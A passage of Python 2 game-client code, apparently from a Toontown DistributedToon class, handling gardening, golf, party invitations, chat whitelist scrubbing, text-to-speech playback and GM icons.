def b_setFishBingoTutorialDone(self, bDone):
self.d_setFishBingoTutorialDone(bDone)
self.setFishBingoTutorialDone(bDone)
def d_setFishBingoTutorialDone(self, bDone):
self.sendUpdate('setFishBingoTutorialDone', [bDone])
def setFishBingoTutorialDone(self, bDone):
self.bFishBingoTutorialDone = bDone
def b_setFishBingoMarkTutorialDone(self, bDone):
self.d_setFishBingoMarkTutorialDone(bDone)
self.setFishBingoMarkTutorialDone(bDone)
def d_setFishBingoMarkTutorialDone(self, bDone):
self.sendUpdate('setFishBingoMarkTutorialDone', [bDone])
def setFishBingoMarkTutorialDone(self, bDone):
self.bFishBingoMarkTutorialDone = bDone
def b_setPetMovie(self, petId, flag):
self.d_setPetMovie(petId, flag)
self.setPetMovie(petId, flag)
def d_setPetMovie(self, petId, flag):
self.sendUpdate('setPetMovie', [petId, flag])
def setPetMovie(self, petId, flag):
pass
def lookupPetDNA(self):
if self.petId and not self.petDNA:
from toontown.pets import PetDetail
PetDetail.PetDetail(self.petId, self.__petDetailsLoaded)
def __petDetailsLoaded(self, pet):
self.petDNA = pet.style
def trickOrTreatTargetMet(self, beanAmount):
if self.effect:
self.effect.stop()
self.effect = TrickOrTreatTargetEffect(beanAmount)
self.effect.play()
def trickOrTreatMilestoneMet(self):
if self.effect:
self.effect.stop()
self.effect = TrickOrTreatMilestoneEffect()
self.effect.play()
def winterCarolingTargetMet(self, beanAmount):
if self.effect:
self.effect.stop()
self.effect = WinterCarolingEffect(beanAmount)
self.effect.play()
def d_reqCogSummons(self, type, suitIndex):
if type == 'single':
pass
elif type == 'building':
pass
elif type == 'invasion':
pass
self.sendUpdate('reqCogSummons', [type, suitIndex])
def cogSummonsResponse(self, returnCode, suitIndex, doId):
messenger.send('cog-summons-response', [returnCode, suitIndex, doId])
def setCogSummonsEarned(self, cogSummonsEarned):
self.cogSummonsEarned = cogSummonsEarned
def getCogSummonsEarned(self):
return self.cogSummonsEarned
def hasCogSummons(self, suitIndex, type=None):
summons = self.getCogSummonsEarned()
curSetting = summons[suitIndex]
if type == 'single':
return curSetting & 1
if type == 'building':
return curSetting & 2
if type == 'invasion':
return curSetting & 4
return curSetting
def setFlowerCollection(self, speciesList, varietyList):
self.flowerCollection = FlowerCollection.FlowerCollection()
self.flowerCollection.makeFromNetLists(speciesList, varietyList)
def getFlowerCollection(self):
return self.flowerCollection
def setMaxFlowerBasket(self, maxFlowerBasket):
self.maxFlowerBasket = maxFlowerBasket
def getMaxFlowerBasket(self):
return self.maxFlowerBasket
def isFlowerBasketFull(self):
return len(self.flowerBasket) >= self.maxFlowerBasket
def setFlowerBasket(self, speciesList, varietyList):
self.flowerBasket = FlowerBasket.FlowerBasket()
self.flowerBasket.makeFromNetLists(speciesList, varietyList)
messenger.send('flowerBasketUpdated')
def getFlowerBasket(self):
return self.flowerBasket
def setShovel(self, shovelId):
self.shovel = shovelId
def attachShovel(self):
self.shovelModel = self.getShovelModel()
self.shovelModel.reparentTo(self.rightHand)
return self.shovelModel
def detachShovel(self):
if self.shovelModel:
self.shovelModel.removeNode()
def getShovelModel(self):
shovels = loader.loadModel('phase_5.5/models/estate/shovels')
shovelId = ['A',
'B',
'C',
'D'][self.shovel]
shovel = shovels.find('**/shovel' + shovelId)
shovel.setH(-90)
shovel.setP(216)
shovel.setX(0.2)
shovel.detachNode()
shovels.removeNode()
return shovel
def setShovelSkill(self, skillLevel):
self.shovelSkill = skillLevel
def getBoxCapability(self):
return GardenGlobals.getShovelPower(self.shovel, self.shovelSkill)
def setWateringCan(self, wateringCanId):
self.wateringCan = wateringCanId
def attachWateringCan(self):
self.wateringCanModel = self.getWateringCanModel()
self.wateringCanModel.reparentTo(self.rightHand)
return self.wateringCanModel
def detachWateringCan(self):
if self.wateringCanModel:
self.wateringCanModel.removeNode()
def getWateringCanModel(self):
scalePosHprsTable = ((0.25, 0.1, 0, 0.2, -90, -125, -45),
(0.2, 0.0, 0.25, 0.2, -90, -125, -45),
(0.2, 0.2, 0.1, 0.2, -90, -125, -45),
(0.2, 0.0, 0.25, 0.2, -90, -125, -45))
cans = loader.loadModel('phase_5.5/models/estate/watering_cans')
canId = ['A',
'B',
'C',
'D'][self.wateringCan]
can = cans.find('**/water_can' + canId)
can.setScale(scalePosHprsTable[self.wateringCan][0])
can.setPos(scalePosHprsTable[self.wateringCan][1], scalePosHprsTable[self.wateringCan][2], scalePosHprsTable[self.wateringCan][3])
can.setHpr(scalePosHprsTable[self.wateringCan][4], scalePosHprsTable[self.wateringCan][5], scalePosHprsTable[self.wateringCan][6])
can.detachNode()
cans.removeNode()
if hasattr(base, 'rwc'):
if base.rwc:
if hasattr(self, 'wateringCan2'):
self.wateringCan2.removeNode()
self.wateringCan2 = can.copyTo(self.rightHand)
else:
self.wateringCan2.removeNode()
return can
def setWateringCanSkill(self, skillLevel):
self.wateringCanSkill = skillLevel
def setGardenSpecials(self, specials):
self.gardenSpecials = specials
if hasattr(self, 'gardenPage') and self.gardenPage:
self.gardenPage.updatePage()
def getGardenSpecials(self):
return self.gardenSpecials
def getMyTrees(self):
treeDict = self.cr.getObjectsOfClass(DistributedGagTree.DistributedGagTree)
trees = []
for tree in treeDict.values():
if tree.getOwnerId() == self.doId:
trees.append(tree)
if not trees:
pass
return trees
def isTreePlanted(self, track, level):
trees = self.getMyTrees()
for tree in trees:
if tree.gagTrack == track and tree.gagLevel == level:
return True
return False
def doIHaveRequiredTrees(self, track, level):
trees = self.getMyTrees()
trackAndLevelList = []
for tree in trees:
trackAndLevelList.append((tree.gagTrack, tree.gagLevel))
haveRequired = True
for curLevel in xrange(level):
testTuple = (
track, curLevel)
if testTuple not in trackAndLevelList:
haveRequired = False
break
return haveRequired
def setTrackBonusLevel(self, trackArray):
self.trackBonusLevel = trackArray
if self.inventory:
self.inventory.updateGUI()
    def getTrackBonusLevel(self, track=None):
        if track == None:
            return self.trackBonusLevel
        return self.trackBonusLevel[track]
def checkGagBonus(self, track, level):
trackBonus = self.getTrackBonusLevel(track)
return trackBonus >= level
def setGardenTrophies(self, trophyList):
self.gardenTrophies = trophyList
def getGardenTrophies(self):
return self.gardenTrophies
def useSpecialResponse(self, returnCode):
messenger.send('use-special-response', [returnCode])
def setGardenStarted(self, bStarted):
self.gardenStarted = bStarted
def getGardenStarted(self):
return self.gardenStarted
def sendToGolfCourse(self, zoneId):
print 'sending to golfCourse'
hoodId = self.cr.playGame.hood.hoodId
golfRequest = {'loader': 'safeZoneLoader', 'where': 'golfcourse',
'how': 'teleportIn',
'hoodId': hoodId,
'zoneId': zoneId,
'shardId': None,
'avId': -1}
base.cr.playGame.getPlace().requestLeave(golfRequest)
return
def getGolfTrophies(self):
return self.golfTrophies
def getGolfCups(self):
return self.golfCups
def setGolfHistory(self, history):
self.golfHistory = history
self.golfTrophies = GolfGlobals.calcTrophyListFromHistory(self.golfHistory)
self.golfCups = GolfGlobals.calcCupListFromHistory(self.golfHistory)
if hasattr(self, 'book'):
self.addGolfPage()
def getGolfHistory(self):
return self.golfHistory
def hasPlayedGolf(self):
retval = False
for historyValue in self.golfHistory:
if historyValue:
retval = True
break
return retval
def setPackedGolfHoleBest(self, packedHoleBest):
unpacked = GolfGlobals.unpackGolfHoleBest(packedHoleBest)
self.setGolfHoleBest(unpacked)
def setGolfHoleBest(self, holeBest):
self.golfHoleBest = holeBest
def getGolfHoleBest(self):
return self.golfHoleBest
def setGolfCourseBest(self, courseBest):
self.golfCourseBest = courseBest
def getGolfCourseBest(self):
return self.golfCourseBest
def setUnlimitedSwing(self, unlimitedSwing):
self.unlimitedSwing = unlimitedSwing
def getUnlimitedSwing(self):
return self.unlimitedSwing
def getPinkSlips(self):
if hasattr(self, 'pinkSlips'):
return self.pinkSlips
else:
return 0
def setPinkSlips(self, pinkSlips):
self.pinkSlips = pinkSlips
def setAccess(self, access):
self.setGameAccess(access)
self.setDisplayName(self.getName())
def setGameAccess(self, access):
self.gameAccess = access
def getGameAccess(self):
if hasattr(self, 'gameAccess'):
return self.gameAccess
else:
return 0
def setDisplayName(self, str):
if not self.isDisguised:
self.setFancyNametag(name=str)
else:
self.removeFancyNametag()
Avatar.Avatar.setDisplayName(self, str)
def setFancyNametag(self, name=None):
if name == None:
name = self.getName()
if self.getNametagStyle() == 100:
self.setFont(ToontownGlobals.getToonFont())
else:
self.setFont(ToontownGlobals.getNametagFont(self.getNametagStyle()))
Avatar.Avatar.setDisplayName(self, name)
self.setFont(ToontownGlobals.getToonFont())
return
def removeFancyNametag(self):
self.nametag.clearShadow()
def getNametagStyle(self):
if hasattr(self, 'nametagStyle'):
return self.nametagStyle
else:
return 0
def setNametagStyle(self, nametagStyle):
if base.config.GetBool('want-nametag-avids', 0):
nametagStyle = 0
self.nametagStyle = nametagStyle
self.setDisplayName(self.getName())
def getAvIdName(self):
paidStr = PythonUtil.choice(self.getGameAccess() == OTPGlobals.AccessFull, 'P', 'F')
return '%s\n%s (%s)' % (self.getName(), self.doId, paidStr)
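    # Rough text-to-speech volume falloff: the toon's offset from the local
    # avatar is clamped to 0-100 and inverted, so nearby toons play loudly
    # and distant ones fade to silence.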
def getTTSVolume(self):
avatarPos = self.getPos(base.localAvatar)
result = int(round((avatarPos[0] + avatarPos[1]) / 2))
if result > 100:
result = 100
elif result < 0:
result = 0
volumeList = range(100, -1, -1)
return volumeList[result]
def playCurrentDialogue(self, dialogue, chatFlags, interrupt=1):
reality = False
if chatFlags & CFExclaim == 512:
reality = True
if interrupt and self.__currentDialogue is not None:
self.__currentDialogue.stop()
self.__currentDialogue = dialogue
if dialogue:
base.playSfx(dialogue, node=self)
elif chatFlags & CFSpeech != 0 or chatFlags & CFExclaim == 512:
if self.nametag.getNumChatPages() > 0:
self.playDialogueForString(self.nametag.getChat(), exclaim=reality)
if self.soundChatBubble != None:
base.playSfx(self.soundChatBubble, node=self)
elif self.nametag.getChatStomp() > 0:
self.playDialogueForString(self.nametag.getStompText(), self.nametag.getStompDelay(), exclaim=reality)
return
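    # Pick a dialogue category (special, exclamation, question or statement)
    # and a length bucket from the chat text, then play the matching animal
    # sound clip.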
def playDialogueForString(self, chatString, delay=0.0, exclaim=False):
if len(chatString) == 0:
return
searchString = chatString.lower()
if searchString.find(OTPLocalizer.DialogSpecial) >= 0:
type = 'special'
elif searchString.find(OTPLocalizer.DialogExclamation) >= 0 or exclaim:
type = 'exclamation'
elif searchString.find(OTPLocalizer.DialogQuestion) >= 0:
type = 'question'
elif random.randint(0, 1):
type = 'statementA'
else:
type = 'statementB'
stringLength = len(chatString)
if stringLength <= OTPLocalizer.DialogLength1:
length = 1
elif stringLength <= OTPLocalizer.DialogLength2:
length = 2
elif stringLength <= OTPLocalizer.DialogLength3:
length = 3
else:
length = 4
self.playDialogue(type, length, chatString, delay)
def playDialogue(self, type, length, chatString='', delay=0.0):
if base.textToSpeech:
chatString = chatString.replace('WLDisplay', '')
soundSequence = Sequence(Wait(delay), Func(self.playTTS, chatString))
self.soundSequenceList.append(soundSequence)
soundSequence.start()
self.cleanUpSoundList()
return
else:
dialogueArray = self.getDialogueArray()
if dialogueArray == None:
return
sfxIndex = None
if type == 'statementA' or type == 'statementB':
if length == 1:
sfxIndex = 0
elif length == 2:
sfxIndex = 1
elif length >= 3:
sfxIndex = 2
elif type == 'question':
sfxIndex = 3
elif type == 'exclamation':
sfxIndex = 4
elif type == 'special':
sfxIndex = 5
else:
self.notify.error('unrecognized dialogue type: ', type)
if sfxIndex != None and sfxIndex < len(dialogueArray) and dialogueArray[sfxIndex] != None:
soundSequence = Sequence(Wait(delay), SoundInterval(dialogueArray[sfxIndex], node=None, listenerNode=base.localAvatar, loop=0, volume=1.0))
self.soundSequenceList.append(soundSequence)
soundSequence.start()
self.cleanUpSoundList()
return
def playTTS(self, chatString):
try:
animalType = self.style.getType()
if self.getTTSVolume() == 0:
return
if sys.platform == 'darwin':
if animalType in ToontownGlobals.Species2Voice.keys():
voice = ToontownGlobals.Species2Voice[animalType]
else:
voice = ToontownGlobals.DefaultVoice
Popen(['say', voice, chatString])
else:
if animalType in ToontownGlobals.Species2Pitch.keys():
pitch = '-p' + str(ToontownGlobals.Species2Pitch[animalType])
else:
pitch = '-p' + str(ToontownGlobals.DefaultPitch)
volume = '-a' + str(self.getTTSVolume())
Popen([base.textToSpeechPath, pitch, volume, '-ven', chatString])
return
except:
base.resetTextToSpeech()
self.setSystemMessage(0, TTLocalizer.TextToSpeechWarning)
return
def cleanUpSoundList(self):
removeList = []
for soundSequence in self.soundSequenceList:
if soundSequence.isStopped():
removeList.append(soundSequence)
for soundSequence in removeList:
self.soundSequenceList.remove(soundSequence)
def sendLogMessage(self, message):
self.sendUpdate('logMessage', [message])
def setChatAbsolute(self, chatString, chatFlags, dialogue=None, interrupt=1, quiet=0):
DistributedAvatar.DistributedAvatar.setChatAbsolute(self, chatString, chatFlags, dialogue, interrupt)
def setChatMuted(self, chatString, chatFlags, dialogue=None, interrupt=1, quiet=0):
self.nametag.setChat(chatString, chatFlags)
self.playCurrentDialogue(dialogue, chatFlags - CFSpeech, interrupt)
def displayTalk(self, chatString, mods=None):
flags = CFSpeech | CFTimeout
if base.talkAssistant.isThought(chatString):
flags = CFThought
chatString = base.talkAssistant.removeThoughtPrefix(chatString)
elif base.talkAssistant.isExclaim(chatString):
flags = CFExclaim | CFTimeout
chatString = base.talkAssistant.removeExclaimPrefix(chatString)
self.nametag.setChat(chatString, flags)
if base.toonChatSounds:
self.playCurrentDialogue(None, flags, interrupt=1)
return
def setMail(self, mail):
DistributedToon.partyNotify.debug('setMail called with %d mail items' % len(mail))
self.mail = []
for i in xrange(len(mail)):
oneMailItem = mail[i]
newMail = SimpleMailBase(*oneMailItem)
self.mail.append(newMail)
def setSimpleMailNotify(self, simpleMailNotify):
DistributedToon.partyNotify.debug('setSimpleMailNotify( %s )' % simpleMailNotify)
self.simpleMailNotify = simpleMailNotify
if self.isLocal():
self.gotCatalogNotify = 1
self.refreshOnscreenButtons()
def setInviteMailNotify(self, inviteMailNotify):
DistributedToon.partyNotify.debug('setInviteMailNotify( %s )' % inviteMailNotify)
self.inviteMailNotify = inviteMailNotify
if self.isLocal():
self.gotCatalogNotify = 1
self.refreshOnscreenButtons()
def setInvites(self, invites):
DistributedToon.partyNotify.debug('setInvites called passing in %d invites.' % len(invites))
self.invites = []
for i in xrange(len(invites)):
oneInvite = invites[i]
newInvite = InviteInfo(*oneInvite)
self.invites.append(newInvite)
def updateInviteMailNotify(self):
invitesInMailbox = self.getInvitesToShowInMailbox()
newInvites = 0
readButNotRepliedInvites = 0
for invite in invitesInMailbox:
if invite.status == PartyGlobals.InviteStatus.NotRead:
newInvites += 1
elif invite.status == PartyGlobals.InviteStatus.ReadButNotReplied:
readButNotRepliedInvites += 1
if __dev__:
partyInfo = self.getOnePartyInvitedTo(invite.partyId)
if not partyInfo:
                        self.notify.error('party info not found in partiesInvitedTo, partyId = %s' % str(invite.partyId))
if newInvites:
self.setInviteMailNotify(ToontownGlobals.NewItems)
elif readButNotRepliedInvites:
self.setInviteMailNotify(ToontownGlobals.OldItems)
else:
self.setInviteMailNotify(ToontownGlobals.NoItems)
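    # Return only the invites still worth displaying: not yet answered, with
    # a known party that is not cancelled and has not already ended.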
def getInvitesToShowInMailbox(self):
result = []
for invite in self.invites:
appendInvite = True
if invite.status == InviteStatus.Accepted or invite.status == InviteStatus.Rejected:
appendInvite = False
if appendInvite:
partyInfo = self.getOnePartyInvitedTo(invite.partyId)
if not partyInfo:
appendInvite = False
if appendInvite:
if partyInfo.status == PartyGlobals.PartyStatus.Cancelled:
appendInvite = False
if appendInvite:
endDate = partyInfo.endTime.date()
curDate = base.cr.toontownTimeManager.getCurServerDateTime().date()
if endDate < curDate:
appendInvite = False
if appendInvite:
result.append(invite)
return result
def getNumInvitesToShowInMailbox(self):
result = len(self.getInvitesToShowInMailbox())
return result
def setHostedParties(self, hostedParties):
DistributedToon.partyNotify.debug('setHostedParties called passing in %d parties.' % len(hostedParties))
self.hostedParties = []
for i in xrange(len(hostedParties)):
hostedInfo = hostedParties[i]
newParty = PartyInfo(*hostedInfo)
self.hostedParties.append(newParty)
def setPartiesInvitedTo(self, partiesInvitedTo):
DistributedToon.partyNotify.debug('setPartiesInvitedTo called passing in %d parties.' % len(partiesInvitedTo))
self.partiesInvitedTo = []
for i in xrange(len(partiesInvitedTo)):
partyInfo = partiesInvitedTo[i]
newParty = PartyInfo(*partyInfo)
self.partiesInvitedTo.append(newParty)
self.updateInviteMailNotify()
def getOnePartyInvitedTo(self, partyId):
result = None
for i in xrange(len(self.partiesInvitedTo)):
partyInfo = self.partiesInvitedTo[i]
if partyInfo.partyId == partyId:
result = partyInfo
break
return result
def getInviteForPartyId(self, partyId):
result = None
for invite in self.invites:
if invite.partyId == partyId:
result = invite
break
return result
def setPartyReplies(self, replies):
DistributedToon.partyNotify.debug('setPartyReplies called passing in %d parties.' % len(replies))
self.partyReplyInfoBases = []
for i in xrange(len(replies)):
partyReply = replies[i]
repliesForOneParty = PartyReplyInfoBase(*partyReply)
self.partyReplyInfoBases.append(repliesForOneParty)
def setPartyCanStart(self, partyId):
DistributedToon.partyNotify.debug('setPartyCanStart called passing in partyId=%s' % partyId)
for partyInfo in self.hostedParties:
if partyInfo.partyId == partyId:
partyInfo.status = PartyGlobals.PartyStatus.CanStart
from toontown.shtiker import EventsPage
if hasattr(self, 'eventsPage') and base.localAvatar.book.entered and base.localAvatar.book.isOnPage(self.eventsPage) and self.eventsPage.getMode() == EventsPage.EventsPage_Host:
base.localAvatar.eventsPage.loadHostedPartyInfo()
if hasattr(self, 'displaySystemClickableWhisper'):
self.displaySystemClickableWhisper(0, TTLocalizer.PartyCanStart, whisperType=WhisperPopup.WTSystem)
else:
self.setSystemMessage(0, TTLocalizer.PartyCanStart)
def setPartyStatus(self, partyId, newStatus):
        DistributedToon.partyNotify.debug('setPartyStatus called passing in partyId=%s status=%s' % (partyId, newStatus))
found = False
for partyInfo in self.hostedParties:
if partyInfo.partyId == partyId:
partyInfo.status = newStatus
found = True
break
for partyInfo in self.partiesInvitedTo:
if partyInfo.partyId == partyId:
partyInfo.status = newStatus
found = True
from toontown.shtiker import EventsPage
if hasattr(self, 'eventsPage') and base.localAvatar.book.entered and base.localAvatar.book.isOnPage(self.eventsPage) and self.eventsPage.getMode() == EventsPage.EventsPage_Invited:
base.localAvatar.eventsPage.loadInvitations()
if newStatus == PartyStatus.Started and hasattr(self, 'displaySystemClickableWhisper'):
invite = self.getInviteForPartyId(partyId)
if invite:
name = ' '
host = base.cr.identifyAvatar(partyInfo.hostId)
if host:
name = host.getName()
if invite.status == InviteStatus.Accepted:
displayStr = TTLocalizer.PartyHasStartedAcceptedInvite % TTLocalizer.GetPossesive(name)
self.displaySystemClickableWhisper(-1, displayStr, whisperType=WhisperPopup.WTSystem)
else:
displayStr = TTLocalizer.PartyHasStartedNotAcceptedInvite % TTLocalizer.GetPossesive(name)
self.setSystemMessage(partyInfo.hostId, displayStr, whisperType=WhisperPopup.WTSystem)
break
if not found:
self.notify.warning("setPartyCanStart can't find partyId=% status=%d" % (partyId, newStatus))
def announcePartyStarted(self, partyId):
DistributedToon.partyNotify.debug('announcePartyStarted')
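        # The early return below disables the whisper notifications to
        # invitees; the loop that follows is never reached.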
return
for partyReplyInfo in self.partyReplyInfoBases:
if partyReplyInfo.partyId == partyId:
for singleReply in partyReplyInfo.replies:
toonId = singleReply.inviteeId
if base.cr.isFriend(toonId):
if base.cr.isFriendOnline(toonId):
if singleReply.status == InviteStatus.Accepted:
self.whisperSCTo(5302, toonId, 0)
else:
self.whisperSCTo(5302, toonId, 0)
def updateInvite(self, inviteKey, newStatus):
DistributedToon.partyNotify.debug('updateInvite( inviteKey=%d, newStatus=%s )' % (inviteKey, InviteStatus.getString(newStatus)))
for invite in self.invites:
if invite.inviteKey == inviteKey:
invite.status = newStatus
self.updateInviteMailNotify()
break
def updateReply(self, partyId, inviteeId, newStatus):
DistributedToon.partyNotify.debug('updateReply( partyId=%d, inviteeId=%d, newStatus=%s )' % (partyId, inviteeId, InviteStatus.getString(newStatus)))
for partyReplyInfoBase in self.partyReplyInfoBases:
if partyReplyInfoBase.partyId == partyId:
for reply in partyReplyInfoBase.replies:
if reply.inviteeId == inviteeId:
reply.status = newStatus
break
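    # Apply whitelist filtering to incoming open chat: spans flagged by the
    # moderation mods (marked with \x07) are garbled, words not on the
    # whitelist are wrapped in WLDisplay tags, and the raw text is used when
    # true-friend chat or a non-toon speaker applies.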
def scrubTalk(self, message, mods, raw):
scrubbed = 0
text = copy.copy(message)
for mod in mods:
index = mod[0]
length = mod[1] - mod[0] + 1
newText = text[0:index] + length * '\x07' + text[index + length:]
text = newText
for friendId, flags in self.friendsList:
if flags & ToontownGlobals.FriendChat:
text = copy.copy(raw)
if not self.isLocal() and self.playerType in [NametagGroup.CCNormal, NametagGroup.CCFreeChat]:
text = copy.copy(raw)
words = text.split(' ')
newwords = []
i = 0
for word in words:
if word == '':
newwords.append(word)
elif word == '.' and len(words) == 1:
newwords.append(word)
elif (word.startswith('.') or word.startswith('!')) and len(word) > 1 and i == 0:
if word[0] == '\x07' or len(word) > 1 and word[1] == '\x07':
newwords.append(word[0] + '\x01WLDisplay\x01' + self.chatGarbler.garbleSingle(self, word) + '\x02')
else:
flag = 0
for friendId, flags in self.friendsList:
if not flags & ToontownGlobals.FriendChat:
flag = 1
if flag:
newwords.append(word[0] + '\x01WLDisplay\x01' + word[1:] + '\x02')
else:
newwords.append(word)
scrubbed = 1
elif word[0] == '\x07' or len(word) > 1 and word[1] == '\x07':
newwords.append('\x01WLDisplay\x01' + self.chatGarbler.garbleSingle(self, word) + '\x02')
scrubbed = 1
elif base.whiteList.isWord(word):
newwords.append(word)
else:
flag = 0
for friendId, flags in self.friendsList:
if not flags & ToontownGlobals.FriendChat:
flag = 1
if flag:
scrubbed = 1
newwords.append('\x01WLDisplay\x01' + word + '\x02')
else:
newwords.append(word)
i += 1
newText = (' ').join(newwords)
return (
newText, scrubbed)
def replaceBadWords(self, text):
words = text.split(' ')
newwords = []
for word in words:
if word == '':
newwords.append(word)
elif word[0] == '\x07':
newwords.append('\x01WLRed\x01' + self.chatGarbler.garbleSingle(self, word) + '\x02')
elif base.whiteList.isWord(word):
newwords.append(word)
else:
newwords.append('\x01WLRed\x01' + word + '\x02')
newText = (' ').join(newwords)
return newText
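    # Apply healing clamped to maxHp and pop the floating "+N" text for the
    # amount actually gained.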
def toonUp(self, hpGained, hasInteractivePropBonus=False):
if self.hp == None or hpGained < 0:
return
oldHp = self.hp
if self.hp + hpGained <= 0:
self.hp += hpGained
else:
self.hp = min(max(self.hp, 0) + hpGained, self.maxHp)
hpGained = self.hp - max(oldHp, 0)
if hpGained > 0:
self.showHpText(hpGained, hasInteractivePropBonus=hasInteractivePropBonus)
self.hpChange(quietly=0)
return
def showHpText(self, number, bonus=0, scale=1, hasInteractivePropBonus=False):
if self.HpTextEnabled and not self.ghostMode:
if number != 0:
if self.hpText:
self.hideHpText()
self.HpTextGenerator.setFont(OTPGlobals.getSignFont())
if number < 0:
self.HpTextGenerator.setText(str(number))
else:
hpGainedStr = '+' + str(number)
if hasInteractivePropBonus:
hpGainedStr += '\n' + TTLocalizer.InteractivePropTrackBonusTerms[0]
self.HpTextGenerator.setText(hpGainedStr)
self.HpTextGenerator.clearShadow()
self.HpTextGenerator.setAlign(TextNode.ACenter)
if bonus == 1:
r = 1.0
g = 1.0
b = 0
a = 1
elif bonus == 2:
r = 1.0
g = 0.5
b = 0
a = 1
elif number < 0:
r = 0.9
g = 0
b = 0
a = 1
else:
r = 0
g = 0.9
b = 0
a = 1
self.HpTextGenerator.setTextColor(r, g, b, a)
self.hpTextNode = self.HpTextGenerator.generate()
self.hpText = self.attachNewNode(self.hpTextNode)
self.hpText.setScale(scale)
self.hpText.setBillboardPointEye()
self.hpText.setBin('fixed', 100)
self.hpText.setPos(0, 0, self.height / 2)
seq = Sequence(self.hpText.posInterval(1.0, Point3(0, 0, self.height + 1.5), blendType='easeOut'), Wait(0.85), self.hpText.colorInterval(0.1, Vec4(r, g, b, 0)), Func(self.hideHpText))
seq.start()
def setAnimPlayRate(self, rate):
if self.getIsTransformed():
actor = self.getActiveTransformation()
actor.setPlayRate(rate, self.playingAnim)
else:
self.setPlayRate(rate, self.playingAnim)
if rate == 1:
self.forcedRate = -1
else:
self.forcedRate = rate
def setName(self, name='unknownDistributedAvatar'):
DistributedPlayer.DistributedPlayer.setName(self, name)
self._handleGMName(name)
base.cr.discordManager.setSmallImageText(base.cr.discordManager.getSmallImageText())
def _handleGMName(self, name=None):
if not name:
name = self.name
self.setDisplayName(name)
if self._isGM:
self.setGMIcon(self._gmType)
else:
self.removeGMIcon()
self.setNametagStyle(self.getNametagStyle())
def setGMIcon(self, gmType=None):
if hasattr(self, 'gmIcon') and self.gmIcon:
return
if not gmType:
gmType = self._gmType
        iconInfo = (
            ('phase_3.5/models/gui/tt_m_gui_gm_toontroop_whistle', '**/*whistleIcon*', 'phase_3.5/maps/gamegui_palette_3clla_1.jpg', 4),
            ('phase_3.5/models/gui/tt_m_gui_gm_toonResistance_fist', '**/*fistIcon*', 'phase_3.5/maps/gamegui_palette_3clla_1.jpg', 4),
            ('phase_3.5/models/gui/tt_m_gui_gm_toontroop_getConnected', '**/*whistleIcon*', 'phase_3.5/maps/gamegui_palette_3clla_1.jpg', 4),
            ('phase_3.5/models/gui/tt_m_gui_gm_toontroop_whistle', '**/*whistleIcon*', 'phase_3.5/maps/gamegui_palette_3clla_2.jpg', 4),
            ('phase_3.5/models/gui/tt_m_gui_gm_toonResistance_fist', '**/*fistIcon*', 'phase_3.5/maps/gamegui_palette_3clla_2.jpg', 4),
            ('phase_3.5/models/gui/tt_m_gui_gm_toontroop_getConnected', '**/*whistleIcon*', 'phase_3.5/maps/gamegui_palette_3clla_2.jpg', 4),
            ('phase_3.5/models/gui/tt_m_gui_gm_toonResistance_fist', '**/*fistIcon*', 'phase_3.5/maps/gamegui_palette_3clla_3.jpg', 4),
            ('phase_3.5/models/gui/tt_m_gui_gm_toontroop_getConnected', '**/*whistleIcon*', 'phase_3.5/maps/gamegui_palette_3clla_3.jpg', 4))
if gmType > len(iconInfo) - 1:
return
modelName, searchString, texture, scale = iconInfo[gmType]
icons = loader.loadModel(modelName)
self.gmIcon = icons.find(searchString)
ts = self.gmIcon.findTextureStage('*')
tex = loader.loadTexture(texture)
self.gmIcon.setTexture(ts, tex, 1)
self.gmIcon.setScale(scale)
self.gmIcon.reparentTo(self.nametag.getNameIcon())
self.setTrophyScore(self.trophyScore)
self.gmIcon.setZ(-2.5)
self.gmIcon.setY(0.0)
self.gmIcon.setColor(Vec4(1.0, 1.0, 1.0, 1.0))
self.gmIcon.setTransparency(1)
self.gmIconInterval = LerpHprInterval(self.gmIcon, 3.0, Point3(0, 0, 0), Point3(-360, 0, 0))
self.gmIconInterval.loop()
def setGMPartyIcon(self):
gmType = self._gmType
iconInfo = ('phase_3.5/models/gui/tt_m_gui_gm_toonResistance_fist', 'phase_3.5/models/gui/tt_m_gui_gm_toontroop_whistle',
'phase_3.5/models/gui/tt_m_gui_gm_toonResistance_fist', 'phase_3.5/models/gui/tt_m_gui_gm_toontroop_getConnected')
if gmType > len(iconInfo) - 1:
return
self.gmIcon = loader.loadModel(iconInfo[gmType])
self.gmIcon.reparentTo(self.nametag.getNameIcon())
self.gmIcon.setScale(3.25)
self.setTrophyScore(self.trophyScore)
self.gmIcon.setZ(1.0)
self.gmIcon.setY(0.0)
self.gmIcon.setColor(Vec4(1.0, 1.0, 1.0, 1.0))
self.gmIcon.setTransparency(1)
self.gmIconInterval = LerpHprInterval(self.gmIcon, 3.0, Point3(0, 0, 0), Point3(-360, 0, 0))
self.gmIconInterval.loop()
def removeGMIcon(self):
if hasattr(self, 'gmIconInterval') and self.gmIconInterval:
self.gmIconInterval.finish()
del self.gmIconInterval
if hasattr(self, 'gmIcon') and self.gmIcon:
self.gmIcon.detachNode()
del self.gmIcon
def _startZombieCheck(self):
self._zombieCheckSerialGen = SerialNumGen(random.randrange(2147483648L))
taskMgr.doMethodLater(2.0 + 60.0 * random.random(), self._doZombieCheck, self._getZombieCheckTaskName())
def _stopZombieCheck(self):
taskMgr.remove(self._getZombieCheckTaskName())
def _getZombieCheckTaskName(self):
return self.uniqueName('zombieCheck')
def _doZombieCheck(self, task=None):
self._lastZombieContext = self._zombieCheckSerialGen.next()
self.cr.timeManager.checkAvOnDistrict(self, self._lastZombieContext)
taskMgr.doMethodLater(60.0, self._doZombieCheck, self._getZombieCheckTaskName())
def _zombieCheckResult(self, context, present):
if context == self._lastZombieContext:
print '_zombieCheckResult[%s]: %s' % (self.doId, present)
if not present:
self.notify.warning('hiding av %s because they are not on the district!' % self.doId)
self.setParent(OTPGlobals.SPHidden)
def setFriendsList(self, friendsList):
DistributedPlayer.DistributedPlayer.setFriendsList(self, friendsList)
for friendId, trueFriend in self.friendsList:
if (
friendId, trueFriend) in self.oldFriendsList:
continue
friend = self.cr.doId2do.get(friendId)
if friend:
base.cr.ttoffFriendsManager.friendOnline(friendId, 0, 0, False)
for friendPair in self.oldFriendsList:
if friendPair in self.friendsList:
continue
if type(friendPair) == tuple:
friendId = friendPair[0]
else:
friendId = friendPair
friend = self.cr.doId2do.get(friendId)
if not friend:
continue
if hasattr(base.localAvatar, 'inEstate') and base.localAvatar.inEstate:
base.cr.estateMgr.removeFriend(self.getDoId(), friendId)
def setImmortalMode(self, flag):
        self.immortalMode = flag
messenger.send(self.uniqueName('magicWordChange'), [1, flag])
def getImmortalMode(self):
return self.immortalMode
def setUnlimitedGags(self, flag):
self.unlimitedGags = flag
